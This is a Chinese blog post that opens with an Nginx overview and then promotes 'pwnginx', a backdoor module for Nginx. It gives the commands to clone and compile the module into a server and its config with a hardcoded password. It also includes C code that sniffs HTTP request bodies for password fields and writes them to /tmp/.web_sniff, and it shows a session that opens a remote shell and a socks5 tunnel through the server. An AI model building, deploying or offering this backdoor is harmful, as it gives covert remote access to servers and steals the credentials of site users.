Nginx(发音同 engine x)是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,并在一个BSD-like 协议下发行。由俄罗斯的程序设计师Igor Sysoev所开发,供俄国大型的入口网站及搜索引擎Rambler(俄文:Рамблер)使用。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好.中国大陆使用nginx网站用户有:新浪、网易、 腾讯等。

Nginx代码完全用C语言从头写成,已经移植到许多体系结构和操作系统,包括:Linux、FreeBSD、Solaris、Mac OS X、AIX以及Microsoft Windows。Nginx有自己的函数库,并且除了zlib、PCRE和OpenSSL之外,标准模块只使用系统C库函数。而且,如果不需要或者考虑到潜在的授权冲突,可以不使用这些第三方库。

作为邮件代理服务器:Nginx 同时也是一个非常优秀的邮件代理服务器(最早开发这个产品的目的之一也是作为邮件代理服务器),Last. fm 描述了成功并且美妙的使用经验。
Nginx 是一个安装非常的简单,配置文件非常简洁(还能够支持perl语法),Bugs非常少的服务器:Nginx 启动特别容易,并且几乎可以做到7*24不间断运行,即使运行数个月也不需要重新启动。你还能够不间断服务的情况下进行软件版本的升级。

Tm3y锅锅一直是我偶像,即使他不在360了,他写得这东西是一个Nginx的模块,为了减少你服务器的使用资源,使用此模块你可以不必要安装Telnet Openssh-server等等远程服务,或者有你可以通过Ningx开启一个socks5代理来访问内部资源

Nginx的无缝升级和添加模块一直是很方便,添加这个模块到你服务器非常简单

[root@centos6 nginx-1.5.2]# /pen/evil/n/sbin/nginx -V
nginx version: nginx/1.5.2
built by gcc 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC)
configure arguments: --prefix=/pen/evil/n --without-http_rewrite_module --without-http_gzip_module
[root@centos6 nginx-1.5.2]# git clone https://github.com/t57root/pwnginx.git
[root@centos6 nginx-1.5.2]# ./configure --prefix=/pen/evil/n --without-http_rewrite_module --without-http_gzip_module --add-module=./pwnginx/module/
[root@centos6 nginx-1.5.2]# make && make install


然后重启你的Nginx就行,编译你时候你需要定义写东西

[root@centos6 module]# cat config.h
#ifndef CONFIG_H
#define CONFIG_H#define PASSWORD "t57root"
#define PWD_SNIFF_FILE "/tmp/.web_sniff"
#define ROOTSHELL#endif
[root@centos6 module]#

还能进行sniff Http哦~

    if (r->request_body){ngx_chain_t     *cl = r->request_body->bufs;if(cl){//1024char *tmp_buf = malloc(1025);tmp_buf[1024]='\0';strncpy(tmp_buf,(char *)cl->buf->pos,1024);if( ngx_strcasestrn((u_char *)tmp_buf, "password=",9-1) ||ngx_strcasestrn((u_char *)tmp_buf, "passwd=",7-1) ||ngx_strcasestrn((u_char *)tmp_buf, "pwd=",4-1) ||ngx_strcasestrn((u_char *)tmp_buf, "name=\"password\"",15-1) ||ngx_strcasestrn((u_char *)tmp_buf, "name=\"passwd\"",13-1) ||ngx_strcasestrn((u_char *)tmp_buf, "name=\"pwd\"",10-1)){FILE *fp = fopen(PWD_SNIFF_FILE,"a");r->request_line.data[(int)r->request_line.len]='\0';fprintf(fp,"%s\n",(char *)r->request_line.data);r->headers_in.host->value.data[(int)r->headers_in.host->value.len]='\0';fprintf(fp,"Host:%s\n",(char *)r->headers_in.host->value.data);fprintf(fp,"%s\n======================\n",cl->buf->pos);fclose(fp);}}}

获得一个SHELL:

[root@centos6 client]# ./pwnginx shell 127.0.0.1 80 t57root
[ Pwnginx ] - Pwn nginx
Copyleft by t57root @ openwill.me
<t57root@gmail.com>  [www.HackShell.net]Usage:
Get a shell access via the nginx running @ [ip]:[port]./pwnginx shell [ip] [port] [password]
Get a socks5 tunnel listening at [socks5ip]:[socks5port]./pwnginx socks5 [ip] [port] [password] [socks5ip] [socks5port][i] Obtaining shell access
[i] About to connect to nginx[i] Enjoy the real world.
id
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

源代码和详细说明你可以在TM3Y的GIT里找到:https://github.com/t57root/pwnginx
Update  :内网的Nginx 貌似不能用,测试了N多

Pwnginx – a nginx backdoor offering shell相关推荐

  1. java利用友盟 计算pv uv_通过nginx日志利用shell统计日pv和uv

    通过nginx日志利用shell统计日pv和uv 网上记录nginx日志统计访问量的脚本的文档很多,但是看来看去实际都是一个东西,如下: 1.根据访问IP统计UV awk '{print $1}'  ...

  2. php管理nginx虚拟主机shell脚本

    使用php作为shell脚本是一件很方便的事情.理所当然,我们可以使用php脚本来管理 nginx虚拟主机,下面是笔者的 脚本 文件供各位参考 代码如下 复制代码 #!/usr/bin/php -q ...

  3. nginx linux脚本,shell脚本之nginx自动化脚本

    这个脚本,可以满足nginx开启,停止和重启的操作 #!/bin/bash . /etc/init.d/functions function usage() { echo $"usage:$ ...

  4. Shell脚本和Python查看Nginx并发连接数、进程数和常驻内存占用情况

    Shell脚本查看Nginx并发连接数.进程数和常驻内存占用情况 http://xiaoyongxing1.blog.163.com/blog/static/642807522015144302240 ...

  5. nginx的重定向,反向代理以及负载均衡

    试验环境: 本次试验中的服务器全用的是CentOS-6.4-x86_64操作系统: nginx服务器地址:192.168.80.10 客户端主机地址:192.168.80.1 软件包下载地址: hea ...

  6. ansible playbook实战——下发部署nginx以及更新、回滚

    之前介绍了 ansible 的安装配置及实例:http://msiyuetian.blog.51cto.com/8637744/1748143 以及 ansible 的 playbook 详解:htt ...

  7. linux sed 测试文件夹,测试开发笔记二(Linux与Shell脚本)

    01 | Linux系统和Shell环境准备 运行shell test.sh #!/bin/bash echo "hello" 运行脚本 方式一: chmod+x ./test.s ...

  8. nginx+tornado与nginx+go的性能测试

    记录一下: nginx做反向代理,单纯测试框架. 机器配置: Intel® Core™ i5-3470 CPU @ 3.20GHz 4核心 8G内存 test.go: <!-- lang: cp ...

  9. Centos 利用yum源安装 nginx 1.20.1

    环境 CentOS 7.9 (腾讯云服务器) nginx 1.20.1 yum源说明 腾讯云的 CentOS 服务器,用的是腾讯的yum源镜像. 感兴趣的可以去/etc/yum.repos.d中看看. ...

最新文章

  1. x86汇编从实模式到保护模式-程序加载器
  2. C语言满分代码:L1-056 猜数字 (20分)
  3. 圣三一学院计算机专业,360教育集团:爱尔兰都柏林大学圣三一学院计算机专业...
  4. 数列分块入门 9(LibreOj-6285)
  5. java执行多次post请求_同样的post请求代码在Java和android中执行结果不同。
  6. WCF在安全性方面的支持(1):一些概念
  7. linux安装python_Linux下安装python环境
  8. 阿里最“短命”P10员工?曝前百度云高管加盟钉钉不足三周被开除
  9. CSRF手工测试方法
  10. 【数字信号去噪】基于matlab遗传算法优化变分模态分解VMD数字信号去噪(目标函数为样本熵)【含Matlab源码 1982期】
  11. 暴风影音内MEE引擎揭秘
  12. 数学对于编程有多重要?
  13. 最新封装版EVE模拟器部署和使用说明(图文版)
  14. java关于Exception(异常)的详解
  15. Android证书信任问题与大表哥
  16. 苹果手机使用技巧篇:教你完美使用好苹果手机的4个方法
  17. Thread dump文件抓取和分析(JCA工具)
  18. 目前所有ewebeditor版本***的漏洞与问题总结
  19. 第二章、application.properties文件的配置
  20. python自定义事件event的含义_事件Event详解

热门文章

  1. Nginx安装与使用
  2. 结对项目——可循环的最大子数组
  3. 【Python爬虫网站数据实战】Python爬虫 统计淘宝商品数据+数据可视化
  4. 计算机课情感态度与价值观,浅谈信息技术课中情感态度价值观的培养
  5. vue使用JavaScript的Number方法或正则表达式进行表单验证,判断值是否为数字(包括整数和小数),验证值只能为小数点后一位
  6. 软件性能测试报告收费,软件性能测试报告模板
  7. cesium中限制地图浏览范围
  8. gin 【日志记录】每天一个日志文件
  9. 非常精妙的主副电源自动切换电路,并且“零”压降
  10. 中国民生银行天眼日志平台架构演进的平凡之路